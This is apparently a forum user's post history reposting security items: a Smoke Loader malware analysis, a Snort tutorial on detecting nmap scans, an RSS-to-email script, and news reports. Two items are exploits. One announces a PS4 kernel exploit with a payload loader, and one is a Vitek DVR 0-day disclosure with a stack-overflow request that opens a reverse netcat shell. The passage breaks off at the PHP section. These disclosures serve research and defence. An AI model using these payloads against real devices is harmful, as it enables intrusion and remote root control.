Fi8sVrs

Everything posted by Fi8sVrs

1. Exploit kits are constantly serving up a variety of exploits and payloads to systems across the Internet on a daily basis. In order to prevent their payloads from being easily mitigated, they typically contain many layers of obfuscation and anti-analysis checks. The authors understand that many eyes will have access to their malware and they often put a shell around the final payload to defend against malware analysis, sandbox analysis, and antivirus protection. Smoke Loader is one such shell that uses a Nullsoft script installer package to deploy the initial malware payload. Below are the details of how Smoke Loader infects the system, attempts to evade analysis, and persists on the system.

Executive Summary

Exploit kit authors make their money by being able to sell the use of their system to many different buyers. In order to do that, they need to be able to protect their final payloads from being easily reversed and defended against. Smoke Loader is a shell that protects the final payload by using multiple layers of injection and hollowing to make analysis difficult. In addition to these layers, they also have active defenses that look for indications that they are running in a virtual machine or being actively analyzed by known security tools. If any of these tools are found they will terminate them to prevent their secrets from being discovered. Once fully installed on the system, Smoke Loader will contact the Command and Control (C2) server to download the arbitrary payload for the exploit kit subscriber. This diagram represents how Smoke Loader goes from initial execution to full presence on the system.

Figure 1: Process Overview

Technical Analysis

Delivery

Nullsoft is an open source script-based tool for building installers on Windows. It is easy to use this wrapper to quickly set up the first stage of the Smoke Loader malware.

For this version of Smoke Loader the installer essentially just dropped and executed the first stage of the malware in the %TEMP% folder, which comes in the form of a malicious DLL called fiberboards.dll and a packed file called Lexigraphy.cab. The fiberboards.dll binary will then unpack Lexigraphy.cab, load the necessary libraries and APIs, and launch another copy of the original malware suspended in memory. The now unpacked stage two is mapped into the memory of the new process and is ready to be executed. The fiberboards.dll file then passes execution on to stage two and exits.

Injection Junction

Stage two is where the fun begins for this sample. This portion of the code contains heavily obfuscated code flow that self-modifies as it is executing. This type of anti-analysis technique can make it very difficult to perform static analysis on the binary. Function calls often go several levels deep and then a new address is pushed onto the stack just before the return in order to redirect the flow of the code to an entirely different function, never to return. Since this is done dynamically, tools such as IDA are unable to follow the code flow, forcing the analyst to step through each function call. Bypassing these types of packers can be time consuming and problematic, especially if there are any kind of anti-debugging tricks that make finding the end of the unpacker difficult. Stepping over a function that seemed unimportant can often result in the malware executing beyond what you expected. Working through this packer, we determined where the next stage was unpacked in memory. This allowed us to set a breakpoint on that location and dump the unpacked malicious code. Once the packer has been bypassed we are now able to more clearly see what the malware is going to do.

Crossroads

Once the code is unpacked, the final version of the malware is visible to us. There are two paths available depending on the current status of the execution flow.

Both paths also share code used to set up required library functions and anti-analysis defenses. Smoke Loader uses a custom hashing algorithm in order to compare various process, library, and window names throughout the program. Here is the algorithm used by this version of Smoke Loader:

Figure 2: Hashing Algorithm

This allows for hardcoded values to be used by the malware without revealing what names they are actually looking for.

Figure 3: Loading Libraries

These two hardcoded values (0x421E4440 and 0x44194744) are the hashed representation of the file names ntdll.dll and kernel32.dll respectively. Each loaded library name is hashed until the values match and the address of that library is recorded. Smoke Loader also dynamically loads each API call using this same hashing algorithm. All of this obfuscation further increases the time to statically analyze functions and determine functionality.

Once the API call addresses are stored, Smoke Loader executes two threads that protect the malicious process from active analysis. These threads hash process names running on the system and the names of active windows and compare them against a hardcoded list of hashes that should be terminated. Using the hashing algorithm makes it difficult to determine exactly which analysis tools will be terminated. In order to attempt to determine which tools will be terminated, we reproduced the hashing algorithm in C++ to be able to run different names through the algorithm. Here is a link to the code, which can take a file and hash all the names. While it is difficult to have a full list of window and process names for all things the authors might have wished to detect, the following list contains some of the values we were able to determine the binary was looking for and would terminate:

Ollydbg
Process Hacker
Procmon

Utilizing the implemented algorithm also made it easier to determine which libraries were going to be loaded, making static analysis of functions quicker.

The threads run in a constant loop looking for any of the hardcoded hashes and window class names to be terminated. The final bit of anti-analysis is checking to see if the malware is running on a virtual machine. This is performed by querying the following registry key:

HKLM\System\CurrentControlSet\Services\Disk\Enum

Four strings are decoded and checked to see if they are contained in the result. If any of the following strings are detected the malware continuously calls the sleep function:

qemu
virtual
vmware
xen
ffffcce24

In order to prepare for the next stage, a hash is generated from hardcoded data within the sample and used as the name of a file mapping created with the API CreateFileMappingA:

63CA4449C7E27B984F81F498FCDFC938

This file mapping contains the full path to where the malware is residing on the system. At this point, the malware is ready to move to its final destination: explorer.exe. A new explorer.exe is launched in a suspended state, the code is hollowed out, and the malware copies itself into its new home. Execution is then resumed and transferred to the new process.

Let's Explore

Much of the same setup functionality discussed above is re-executed in the new explorer process, ensuring that all the libraries are loaded and the anti-analysis threads are executing. A check is performed to see if the parent process is explorer and if it is, the next phase of the malware executes. The same hash is created as above and the file mapping opened so this stage of the malware can retrieve the location of the original malware. The previous stage will wait until this handle is closed before exiting. Next, Smoke Loader obtains the user agent string for the current version of Internet Explorer installed on the system. In order to verify that the system has a connection to the Internet, it will attempt to contact hxxp://www.bing.com and will continue attempting to connect to this address every sixty seconds until it gets a response.

Before moving the original malicious executable to its new location, the computer name and the volume information are retrieved from the system and hashed to serve as a mutex on the infected system. This ensures that there aren't multiple infections on the current machine while it is being moved to the new location. Smoke Loader then searches through the following registry key looking for any subkeys that have the values HelpLink and URLInfoAbout:

HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall

Some of this information will be used to look less suspicious when installing persistence on the system further down. An eight character name is generated based on the last eight characters of the unique ID generated above and is used as the future name of the malware. The first 8 characters of the ID are used to generate the random folder name it will be contained in. Here is a visual demonstration of this process:

Figure 4: Name Generation

Now that the folder and malware name have been generated, the new path for the malware is put together:

%APPDATA%\Microsoft\bteurgsd\ugivagdt.exe

The directory is created according to the above location, the malware is copied from its original dropped location to the new malware path, and the original copy is deleted. It will also attempt to delete ugivagdt.exe:Zone.Identifier in the newly created folder. In order to further blend in with the system the folder and the malware file have their attributes changed to system and hidden and both are timestomped using the timestamps from advapi32.dll in the system folder. In order to set up persistence, Smoke Loader uses information taken from the uninstall registry key above and uses it to create a value in the following key:

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

In the case of my analysis machine, Process Hacker 2 was chosen as the target to hide on the system.

Figure 5: Persistence

This essentially uses policy settings to specify startup programs for the user. Once the persistence is in place, a thread is created that repeatedly checks for the existence of this key. If the key is deleted it will re-create the key to maintain persistence. With the malware fully installed on the system, a thread is launched that performs the remainder of the tasks for Smoke Loader.

Are we there yet?

This thread contains the functionality for handling whatever type of payload the exploit kit is currently serving up. At the time of this writing, the C2 server was no longer active. Fake traffic is also generated in this thread using the URL taken from the Uninstall key above (hxxp://sourceforge.net/projects/processhacker/support for example on my analysis system). This is done on a random timer and several times in order to look legitimate on the system. Finally, once it has done its best to look legitimate, the C2 server is contacted. From here, additional payloads can be downloaded and executed or injected directly into the process. Additional C2 servers can also be added to the list in order to maintain the ability of Smoke Loader to contact its controllers.

Conclusion

Exploit kits can deliver potentially thousands of samples across the Internet on a daily basis. Because of the sheer number of eyes that may see their samples, they are often very difficult to analyze. Heavy code obfuscation, anti-analysis, anti-virtualization, and multiple layers of injection and hollowing are common fare for this type of malware. This class of malware can often have new and interesting ways of evading detection in order to retrieve the final payload from another location, which makes them worth analyzing in detail. By listing IOCs and detailing the tactics and techniques used, networks can be better protected from these malicious threats.

Indicators

Indicator | Type | Context
http://hellobro.bit | Domain | Command and Control Server
4082bf938715c3d4ca639e47313f991b | MD5 | Smoke Loader
88048f15b3206de1efd6147bac585be17c84caafd9ac2a0392d4886ce5a148f5 | SHA256 | Smoke Loader
63CA4449C7E27B984F81F498FCDFC938 | File Mapping |

Source: https://www.cybrary.it/channelcontent/smoke-and-mirrors/
2. Today we are going to discuss how to detect an NMAP scan using Snort, but before moving ahead kindly read our previous articles related to Snort installation (manually or using apt-repository) and its rule configuration to enable it as an IDS for your network. Basically in this article we are testing Snort against various NMAP scans, which will help network security analysts set up Snort rules in such a way that they become aware of any kind of NMAP scanning.

Requirement

Attacker: Kali Linux (NMAP Scan)
Target: Ubuntu (Snort as IDS)
Optional: Wireshark (we have added it in our tutorial so that we can clearly confirm all incoming and outgoing packets of the network)

Let's Begin!!

Identify NMAP Ping Scan

As we know, any attacker will start an attack by identifying host status by sending ICMP packets using a ping scan. Therefore be smart and add a rule in Snort which will analyse an NMAP ping scan when someone tries to scan your network to identify the live hosts of the network. Execute the given below command in Ubuntu's terminal to open the Snort local rule file in a text editor.

sudo gedit /etc/snort/rules/local.rules

Now add the given below line, which will capture the incoming traffic coming to 192.168.1.105 (Ubuntu IP) for the ICMP protocol.

alert icmp any any -> 192.168.1.105 any (msg:"NMAP ping sweep Scan"; dsize:0; sid:10000004; rev:1;)

Turn on IDS mode of Snort by executing the given below command in the terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now using the attacking machine execute the given below command to identify the status of the target machine, i.e. whether the host is up or down.

nmap -sP 192.168.1.105 --disable-arp-ping

If you execute the above command without the parameter "--disable-arp-ping" then it will work as a default ping sweep scan, which sends ARP packets instead of ICMP on the target's network, and Snort may not be able to capture the NMAP ping scan in that scenario; therefore we have used the parameter "--disable-arp-ping" in the above command.

As I explained above, we are involving Wireshark in this tutorial so that you can clearly see the packets sent from the attacker's network to the target's network. Hence in the given below image you can notice that ICMP request packets as well as ICMP reply packets are both part of the network traffic.

Come back to your target machine where Snort is capturing all incoming traffic; here you will observe that it is generating an alert for the NMAP Ping Sweep scan. Hence you can block the attacker's IP to protect your network from further scanning.

Identify NMAP TCP Scan

Now in order to connect with the target network, an attacker may go with network enumeration using either the TCP protocol or the UDP protocol. Let's assume the attacker chooses TCP scanning for network enumeration; in that situation we can apply the following rule in the Snort local rule file.

alert tcp any any -> 192.168.1.105 22 (msg:"NMAP TCP Scan"; sid:10000005; rev:2;)

The above rule is only applicable for port 22, so if you want to scan any other port then replace 22 with the port you want to scan, else you can also use "any" to analyse all ports. Enable NIDS mode of Snort as done above. Now again using the attacker machine execute the given below command for a TCP scan on port 22.

nmap -sT -p22 192.168.1.105

From the given below image you can observe that Wireshark has captured TCP packets from 192.168.1.104 to 192.168.1.105.

Here you can confirm that our Snort is absolutely working when the attacker is scanning port 22 using an nmap TCP scan, and it is showing the attacker's IP from where traffic is coming on port 22. Hence you can block this IP to protect your network from further scanning.

Identify NMAP XMAS Scan

As we know, TCP communication follows a three-way handshake to establish a TCP connection with the target machine, but sometimes instead of using the SYN, SYN/ACK, ACK flags an attacker chooses an XMAS scan to connect with the target by sending data packets with the FIN, PSH & URG flags.

Let's assume the attacker chooses XMAS scanning for network enumeration; in that situation we can apply the following rule in the Snort local rule file.

alert tcp any any -> 192.168.1.105 22 (msg:"Nmap XMAS Tree Scan"; flags:FPU; sid:1000006; rev:1;)

Again the above rule is only applicable for port 22 and will listen for incoming traffic when packets come with the FIN, PSH & URG flags. So if you want to scan any other port then replace 22 with the port you want to scan, else you can also use "any" to analyse all ports. Enable NIDS mode of Snort as done above. Now again using the attacker machine execute the given below command for an XMAS scan on port 22.

nmap -sX -p22 192.168.1.105

From the given below image you can observe that Wireshark is showing 2 packets from the attacker machine to the target machine that have been sent using the FIN, PSH, URG flags.

Come back to your target machine where Snort is capturing all incoming traffic; here you will observe that it is generating an alert for the NMAP XMAS scan. Hence you can block the attacker's IP to protect your network from further scanning.

Identify NMAP FIN Scan

Instead of using the SYN, SYN/ACK and ACK flags to establish a TCP connection with the target machine, an attacker may choose a FIN scan to connect with the target by sending data packets with the FIN flag only. Let's assume the attacker chooses FIN scanning for network enumeration; in that situation we can apply the following rule in the Snort local rule file.

alert tcp any any -> 192.168.1.105 22 (msg:"Nmap FIN Scan"; flags:F; sid:1000008; rev:1;)

Again the above rule is only applicable for port 22 and will listen for incoming traffic when packets come with the FIN flag. So if you want to scan any other port then replace 22 with the port you want to scan, else you can also use "any" to analyse all ports. Enable NIDS mode of Snort as done above. Now again using the attacker machine execute the given below command for a FIN scan on port 22.

nmap -sF -p22 192.168.1.105

From the given below image you can observe that Wireshark is showing 2 packets from the attacker machine to the target machine that have been sent using the FIN flag.

Come back to your target machine where Snort is capturing all incoming traffic; here you will observe that it is generating an alert for the NMAP FIN scan. Hence you can block the attacker's IP to protect your network from further scanning.

Identify NMAP NULL Scan

Instead of using the SYN, SYN/ACK and ACK flags to establish a TCP connection with the target machine, an attacker may choose a NULL scan to connect with the target by sending data packets with no flags at all. Let's assume the attacker chooses NULL scanning for network enumeration; in that situation we can apply the following rule in the Snort local rule file.

alert tcp any any -> 192.168.1.105 22 (msg:"Nmap NULL Scan"; flags:0; sid:1000009; rev:1;)

Again the above rule is only applicable for port 22 and will listen for incoming traffic when packets come with no flags. So if you want to scan any other port then replace 22 with the port you want to scan, else you can also use "any" to analyse all ports. Enable NIDS mode of Snort as done above. Now again using the attacker machine execute the given below command for a NULL scan on port 22.

nmap -sN -p22 192.168.1.105

From the given below image you can observe that Wireshark is showing 2 packets from the attacker machine to the target machine that have been sent with no flags.

Come back to your target machine where Snort is capturing all incoming traffic; here you will observe that it is generating an alert for the NMAP Null scan. Hence you can block the attacker's IP to protect your network from further scanning.

Identify NMAP UDP Scan

In order to identify open UDP ports and running services an attacker may choose an NMAP UDP scan to establish a connection with the target machine for network enumeration; in that situation we can apply the following rule in the Snort local rule file.

alert udp any any -> 192.168.1.105 any (msg:"Nmap UDPScan"; sid:1000010; rev:1;)

Again the above rule is applicable for every UDP port and will listen for incoming traffic when packets are coming over any UDP port, so if you want to capture traffic for any particular UDP port then replace "any" with that specific port number as done above. Enable NIDS mode of Snort as done above. Now again using the attacker machine execute the given below command for a NULL scan on port 22.

nmap -sU -p68 192.168.1.105

From the given below image you can observe that Wireshark is showing 2 packets from the attacker machine to the target machine that have been sent over a UDP port.

Come back to your target machine where Snort is capturing all incoming traffic; here you will observe that it is generating an alert for the NMAP UDP scan. Hence you can block the attacker's IP to protect your network from further scanning.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

Source: http://www.hackingarticles.in/detect-nmap-scan-using-snort/
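As an added example that is not part of the Hacking Articles post above, this script applies the same matching logic as the post's local.rules entries to constructed packet records, so the exact-flag semantics of Snort's flags: keyword and the overlap between the generic port-22 rule and the flag-scan rules can be checked offline. The Packet record, the 192.168.1.104 attacker address and the sample traffic are all constructed for this example.

```python
from collections import Counter, namedtuple

# Constructed packet record holding only the fields the post's rules look at.
Packet = namedtuple("Packet", "src dst proto dport flags dsize")

TARGET = "192.168.1.105"  # the Ubuntu host running Snort in the post

# TCP flag bits, named the way Snort's flags: keyword names them.
FLAG_BITS = {"F": 0x01, "S": 0x02, "R": 0x04, "P": 0x08, "A": 0x10, "U": 0x20}


def tcp_flags(letters):
    """'FPU' -> 0x29, 'S' -> 0x02, '' -> 0 (the NULL-scan case)."""
    return sum(FLAG_BITS[c] for c in letters)


def exact_flags(letters):
    # A plain 'flags:FPU;' in Snort matches only when exactly these bits are
    # set; 'flags:0;' matches a packet with no flags at all.
    want = tcp_flags(letters)
    return lambda pkt: pkt.flags == want


# (sid, msg, proto, dport or None for "any", extra predicate), one entry per
# rule the post adds to local.rules.
RULES = [
    (10000004, "NMAP ping sweep Scan", "icmp", None, lambda p: p.dsize == 0),
    (10000005, "NMAP TCP Scan", "tcp", 22, lambda p: True),
    (1000006, "Nmap XMAS Tree Scan", "tcp", 22, exact_flags("FPU")),
    (1000008, "Nmap FIN Scan", "tcp", 22, exact_flags("F")),
    (1000009, "Nmap NULL Scan", "tcp", 22, exact_flags("")),
    (1000010, "Nmap UDPScan", "udp", None, lambda p: True),
]


def matching_sids(pkt):
    """Return the sids of every rule this packet would trigger, in rule order."""
    if pkt.dst != TARGET:
        return []
    return [sid for sid, _msg, proto, dport, pred in RULES
            if proto == pkt.proto and dport in (None, pkt.dport) and pred(pkt)]


def alerts(packets):
    """(sid, msg, src) tuples in the order a console-mode Snort would emit them."""
    msgs = {sid: msg for sid, msg, *_ in RULES}
    return [(sid, msgs[sid], p.src) for p in packets for sid in matching_sids(p)]


def noisy_sources(packets, threshold=3):
    """Sources that triggered at least `threshold` alerts: candidates to block."""
    counts = Counter(src for _sid, _msg, src in alerts(packets))
    return {src: n for src, n in counts.items() if n >= threshold}


# Constructed traffic: the six scans from the post plus two benign packets.
ATTACKER = "192.168.1.104"
SAMPLE = [
    Packet(ATTACKER, TARGET, "icmp", None, 0, 0),                   # nmap -sP --disable-arp-ping
    Packet(ATTACKER, TARGET, "tcp", 22, tcp_flags("S"), 0),         # nmap -sT -p22 (SYN)
    Packet(ATTACKER, TARGET, "tcp", 22, tcp_flags("FPU"), 0),       # nmap -sX -p22
    Packet(ATTACKER, TARGET, "tcp", 22, tcp_flags("F"), 0),         # nmap -sF -p22
    Packet(ATTACKER, TARGET, "tcp", 22, tcp_flags(""), 0),          # nmap -sN -p22
    Packet(ATTACKER, TARGET, "udp", 68, 0, 0),                      # nmap -sU -p68
    Packet("192.168.1.50", TARGET, "icmp", None, 0, 56),            # ordinary ping, 56-byte payload
    Packet("192.168.1.50", TARGET, "tcp", 80, tcp_flags("S"), 0),   # web request, not port 22
]

if __name__ == "__main__":
    for sid, msg, src in alerts(SAMPLE):
        print(f"[**] [1:{sid}:1] {msg} [**] from {src}")
    print("block candidates:", noisy_sources(SAMPLE))
```

Running it shows the generic port-22 rule firing on every TCP packet to 22, including the XMAS, FIN and NULL probes and any legitimate SSH login, so the more specific flag alerts always arrive alongside it; counting alerts per source before blocking avoids acting on a single packet.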
3. feed2email

Send RSS/Atom feeds to e-mail

requirements.txt:

feedparser==5.2.1

feed2email.py:

```python
#!/usr/bin/env python3
# vim: set ai et ts=4 sw=4:
# feed2email.py
# (c) Aleksander Alekseev 2016-2017
# http://eax.me/

import feedparser
from smtplib import SMTP
# from smtplib import SMTP_SSL as SMTP
from email.mime.text import MIMEText
from contextlib import contextmanager
import signal
import getpass
import hashlib
import time
import sys
import re

server = 'smtp.yandex.ru'
port = 587  # 25
login = "YOUR_SENDER_LOGIN"
from_addr = "NEWS <YOUR_SENDER_LOGIN@yandex.ru>"
receiver = "YOUR_EMAIL"
processed_urls_fname = "processed-urls.txt"
feed_list_fname = "feed-list.txt"
# change to True before first run or you will receive A LOT of emails
# then change back to False
fake_send = False
sleep_time = 60*5       # seconds
net_timeout = 20        # seconds
smtp_retry_time = 30    # seconds
smtp_retries_num = 5

# >>> import hashlib
# >>> hashlib.sha1(b"qwerty").hexdigest()
# 'b1b3773a05c0ed0176787a4f1574ff0075f7521e'
pwhash = 'YOUR_PASSWORD_SHA1_HASH'

# FUNCS

class TimeoutException(Exception):
    pass

@contextmanager
def timeout_sec(seconds):
    # SIGALRM-based timeout; only works on the main thread of a POSIX system
    def signal_handler(signum, frame):
        raise TimeoutException(Exception("Timed out!"))
    signal.signal(signal.SIGALRM, signal_handler)
    signal.alarm(seconds)
    try:
        yield
    finally:
        signal.alarm(0)

def file_to_list(fname):
    rslt = []
    with open(fname, "r") as f:
        rslt = [x for x in f.read().split("\n") if x.strip() != ""]
    return rslt

# MAIN

password = getpass.getpass("SMTP Password: ")
if hashlib.sha1(bytearray(password, 'utf-8')).hexdigest() != pwhash:
    print("Invalid password", file=sys.stderr)
    sys.exit(1)

while True:
    feed_list = file_to_list(feed_list_fname)
    # filter comments
    feed_list = [x for x in feed_list if not re.match(r"(?i)\s*#", x)]
    keep_urls = 1000*len(feed_list)
    processed_urls = []
    try:
        processed_urls = file_to_list(processed_urls_fname)
    except FileNotFoundError:
        pass

    print("Processing {} feeds...".format(len(feed_list)))
    for feed in feed_list:
        print(feed)
        f = None
        try:
            with timeout_sec(net_timeout):
                f = feedparser.parse(feed)
        except TimeoutException:
            print("ERROR: Timeout!")
            continue

        feed_title = f['feed'].get('title', '(NO TITLE)')
        feed_link = f['feed'].get('link', '(NO LINK)')
        for entry in f['entries']:
            if entry['link'] in processed_urls:
                continue
            subject = "{title} | {feed_title} ({feed_link})".format(
                title=entry.get('title', '(NO TITLE)'),
                feed_title=feed_title,
                feed_link=feed_link
            )
            print(subject)
            summary = entry.get('summary', '(NO SUMMARY)')
            body = "{summary}\n\n{link}\n\nSource feed: {feed}".format(
                summary=summary[:256],
                link=entry['link'],
                feed=feed
            )
            print(body)
            print("-------")

            msg = MIMEText(body, 'plain')
            msg['Subject'] = subject
            msg['From'] = from_addr
            msg['To'] = receiver

            if not fake_send:
                for attempt in range(1, smtp_retries_num+1):
                    try:
                        with timeout_sec(net_timeout), SMTP(server, port) as conn:
                            conn.starttls()
                            conn.login(login, password)
                            conn.sendmail(from_addr, [receiver], msg.as_string())
                        break
                    except Exception as exc:
                        print(("Failed to send email {}/{} - {}, " +
                               "retrying in {} seconds").format(
                                   attempt, smtp_retries_num, exc, smtp_retry_time))
                        time.sleep(smtp_retry_time)

            # remember the URL even when fake_send is on, so the first real
            # run does not re-send the whole backlog
            processed_urls = [entry['link']] + processed_urls
            with open(processed_urls_fname, "w") as urls_file:
                urls_file.write("\n".join(processed_urls[:keep_urls]))

    print("Sleeping {} seconds...".format(sleep_time))
    time.sleep(sleep_time)
```

Download: feed2email-master.zip

Source: https://github.com/afiskon/feed2email
  4. In 2015, artist Ai Weiwei was bugged in his home, presumably by government actors. This situation raised our awareness on the lack of research in our community about operating and detecting spying microphones. Our biggest concern was that most of the knowledge came from fictional movies. Therefore, we performed a deep study on the state-of-the-art of microphone bugs, their characteristics, features and pitfalls. It included real life experiments trying to bug ourselves and trying to detect the hidden mics. Given the lack of open detection tools, we developed a free software SDR-based program, called Salamandra, to detect and locate hidden microphones in a room. After more than 120 experiments we concluded that placing mics correctly and listening is not an easy task, but it has a huge payoff when it works. Also, most mics can be detected easily with the correct tools (with some exceptions on GSM mics). In our experiments the average time to locate the mics in a room was 15 minutes. Locating mics is the novel feature of Salamandra, which is released to the public with this work. We hope that our study raises awareness on the possibility of being bugged by a powerful actor and the countermeasure tools available for our protection. Video: https://media.ccc.de/v/34c3-8735-spy_vs_spy_a_modern_study_of_microphone_bugs_operation_and_detection#video&t=0
5. Leaky RootsWeb Server Exposes Some Ancestry.com User Data

Ancestry.com said it closed portions of its community-driven genealogy site RootsWeb as it investigated a leaky server that exposed 300,000 passwords, email addresses and usernames to the public internet. In a statement issued over the weekend, Chief Information Security Officer of Ancestry.com Tony Blackham said a file containing the user data was publicly exposed on a RootsWeb server. On Wednesday, Ancestry.com told Threatpost it believed the data was exposed in November 2015. The data resided on RootsWeb's infrastructure, and is not linked to Ancestry.com's site and services.

Ancestry.com said RootsWeb has "millions" of members who use the site to share family trees, post user-contributed databases and host thousands of messaging boards. The company said RootsWeb doesn't host sensitive information such as credit card data or social security numbers. It added that there are no indications the data exposed to the public internet has been accessed by a malicious third party. The company declined to specify how and why the data was stored insecurely on the server.

The exposure of data was first brought to Ancestry.com's attention on Dec. 20 when Troy Hunt, who runs the data breach repository HaveIBeenPwned.com, reported to the company the existence of the file on RootsWeb's server. According to a tweet by Hunt, the publicly exposed data contained plain text passwords.

The company said that as it investigates, some of RootsWeb's services would be taken offline. On Wednesday, visitors were greeted with the message:

Customers were told that as a result of some sections of RootsWeb being taken offline it "may not be able to salvage everything" as Ancestry.com works to resolve this issue and "improve the site's infrastructure." Ancestry.com declined to say how long the site would have limited functionality.

However, in a comment section of Ancestry.com a company representative told a customer: "We do not have a specific timeline at this point. We hope it will take no more than a few weeks to resolve these issues."

Blackham said 55,000 impacted accounts will be "locked" and users trying to access them will be forced to create a new password. Affected users will also be notified by email of the user data exposure. Over the past several days RootsWeb users have peppered Blackham's security update blog post with passionate requests to preserve user data and return functionality.

Ancestry.com joins a long list of companies that have fallen victim to a leaky server that has inadvertently exposed sensitive company information to the public internet in 2017.

Via threatpost.com
6. # PS4 4.05 Kernel Exploit

---

## Summary

In this project you will find a full implementation of the "namedobj" kernel exploit for the PlayStation 4 on 4.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, *does not* contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port `9020` and will execute them upon receipt.

You can find fail0verflow's original write-up on the bug [here](https://fail0verflow.com/blog/2017/ps4-namedobj-exploit/), you can find my technical write-up which dives more into implementation specifics ~~here~~ (this is still in progress and will be published within the next few days).

## Patches Included

The following patches are made by default in the kernel ROP chain:

1) Disable kernel write protection
2) Allow RWX (read-write-execute) memory mapping
3) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.

## Notes

- This exploit is actually incredibly stable at around 95% in my tests. WebKit very rarely crashes and the same is true with kernel.
- I've built in a patch so the kernel exploit will only run once on the system. You can still make additional patches via payloads.
- A custom syscall is added (#11) to execute any RWX memory in kernel mode, this can be used to execute payloads that want to do fun things like jailbreaking and patching the kernel.
- An SDK is not provided in this release, however a barebones one to get started with may be released at a later date.
- I've released a sample payload [here](http://www.mediafire.com/file/n4boybw0e06h892/debug_settings.bin) that will make the necessary patches to access the debug menu of the system via settings, jailbreaks, and escapes the sandbox.

## Contributors

I was not alone in this exploit's development, and would like to thank those who helped me along the way below.

- [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
- [Flatz](https://twitter.com/flat_z)
- [CTurt](https://twitter.com/CTurtE)
- Anonymous

E-DB Note: Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43397.zip

Source: exploit-db.com
7. Pavel Lerner, a prominent Russian blockchain expert and known managing director of one of the major crypto-exchanges EXMO, has allegedly been kidnapped by "unknown" criminals in the Ukrainian capital of Kiev.

According to Ukraine-based web publication Strana, Lerner, a 40-year-old citizen of Russia, was kidnapped on December 26 when he was leaving his office in the center of town (located on Stepan Bandera Avenue). Unknown kidnappers in dark clothes and balaclavas dragged Lerner into their black Mercedes-Benz Vito car (state number AA 2063 MT) and drove away in an unknown direction.

The information comes from an anonymous source in Ukrainian law enforcement agencies, though multiple investigations are currently underway to find out why and by whom Lerner was kidnapped.

Lerner is a recognized IT specialist in Ukraine who led a number of startups related to blockchain technology development and mining operations. Lerner is also the managing director of EXMO, a major UK-based cryptocurrency exchange founded in 2013 and well-known with Russians for accepting ruble payments.

Law enforcers in Kiev have begun an investigation and are currently conducting a search operation, working out all possible leads in the case, which is described as a kidnapping. EXMO's representatives confirmed media reports in a statement to the local crypto journal BitNovosti and appealed for any information that could lead to the finding of Lerner. The company representatives also assured its customers that EXMO operations were not affected by the incident and that Lerner did not have direct access to any cryptocurrency account or other personal data.

Lerner's case has been considered to be yet another case involving a Russian national with a cryptocurrency background. In July this year, Alexander Vinnik, a 38-year-old Russian citizen and operator of cryptocurrency exchange BTC-e, was detained in Northern Greece at the request of US law enforcement authorities. The Greek court in October also ruled to extradite Vinnik to the United States. The US authorities accused Vinnik of crimes related to the hack of Mt. Gox, which was shut down in 2014 following a massive series of mysterious robberies, which totaled at least $375 million in Bitcoin.

Via thehackernews.com
8. Vitek suffers from remote code execution and information disclosure vulnerabilities.

```text
[STX]

Subject: Vitek RCE and Information Disclosure (and possible other OEM)
Attack vector: Remote
Authentication: Anonymous (no credentials needed)
Researcher: bashis <mcw noemail eu> (December 2017)
PoC: https://github.com/mcw0/PoC
Release date: December 22, 2017
Full Disclosure: 0-day

heap: Executable + Non-ASLR
stack: Executable + ASLR

-[OEM (found in the code)]-

Vitek (http://www.vitekcctv.com/) - Verified: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
Thrive
Wisecon
Sanyo
Inodic
CBC
Elbex
Y3K
KTNC

-[Stack Overflow RCE]-

[Reverse netcat shell]
$ echo -en "GET /dvrcontrol.cgi?nc\x24\x7bIFS\x7d192.168.57.1\x24\x7bIFS\x7d31337\x24\x7bIFS\x7d-e\x24\x7bIFS\x7dsh\x24\x7bIFS\x7d HTTP/1.0\r\nAuthorization Pwned: `for((i=0;i<272;i++)); do echo -en "A";done`\x80\x9a\x73\x02\xc8\x4a\x11\x20\r\n\r\n"|ncat 192.168.57.20 81

[Listener]
$ ncat -vlp 31337
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B
Ncat: Listening on :::31337
Ncat: Listening on 0.0.0.0:31337
Ncat: Connection from 192.168.57.20.
Ncat: Connection from 192.168.57.20:36356.
pwd
/opt/fw
whoami
root
exit
$

Note:
1. Badbytes: 0x00,0x09,0x0a,0x0b,0x0c,0x0d,0x20
2. 0x20 will be replaced with 0x00 by the H4/H1/N1 binary, use this to jump binary included system() address: 0x00114AC8 [system() call in H4]
3. 0x02739A0C + 0x74 = $r11 address we need (0x2739A80) to point our CMD string on heap for system() in $r0

H1: VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6
.rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001CD138 SUB R3, R11, #0x74
.text:001CD13C MOV R0, R3
.text:001CD140 BL system

H4: VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
.rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:00114AC8 SUB R3, R11, #0x74
.text:00114ACC MOV R0, R3
.text:00114AD0 BL system

N1: VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6
.rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
.text:001E9F0C SUB R3, R11, #0x74
.text:001E9F10 MOV R0, R3
.text:001E9F14 BL system

-[PHP RCE]-

Note: /mnt/usb2 must be mounted and R/W... (normally R/O w/o USB stick inserted)

[Reverse netcat shell (forking)]
